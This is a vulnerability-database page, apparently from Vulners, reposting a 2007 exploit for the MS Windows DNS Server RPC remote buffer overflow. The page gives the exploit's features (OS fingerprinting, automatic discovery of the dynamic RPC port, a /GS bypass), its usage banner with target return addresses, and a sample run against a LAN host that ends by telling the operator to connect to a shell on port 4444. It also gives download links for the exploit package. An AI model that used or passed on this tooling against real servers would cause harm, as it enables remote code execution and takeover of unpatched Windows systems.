Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2

🗓️ 18 Apr 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 18 Views

MS Windows DNS RPC Remote Buffer Overflow Exploit v2 featuring remote port 445, dynamic TCP port targeting, OS fingerprinting and multiple target options for Win2k and Win2k

Code

                                                  Exploit v2 features:
  - Target Remote port 445 (by default but requires auth)
  - Manual target for dynamic tcp port (without auth)
  - Automatic search for dynamic dns rpc port
  - Local and remote OS fingerprinting (auto target)
  - Windows 2000 server and Windows 2003 server (Spanish) supported by default
  - Fixed bug with Windows 2003 Shellcode
  - Universal local exploit for Win2k (automatic search for opcodes)
  - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
  - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
  - Microsoft RPC api used ( who cares? :p )


D:\Programación\DNSTEST>dnstest
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

 Usage:   dnstest -h 127.0.0.1 (Universal local exploit)
          dnstest -h host [-t id] [-p port]
 Targets:
      0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
      1 (0x79467ef8) - Win2k  server SP4 Spanish -   (default for win2k )
      2 (0x7c4fedbb) - Win2k  server SP4 English
      3 (0x7963edbb) - Win2k  server SP4 Italian
      4 (0x41414141) - Windows all Denial of Service


D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444


also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip 
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Apr 2007 00:00Current
7.1High risk
Vulners AI Score7.1
windows 2000windows 2003 serverremote port 445dynamic tcp portos fingerprintingspanish supportbug fixbuffer overflow exploitmicrosoft rpc api
18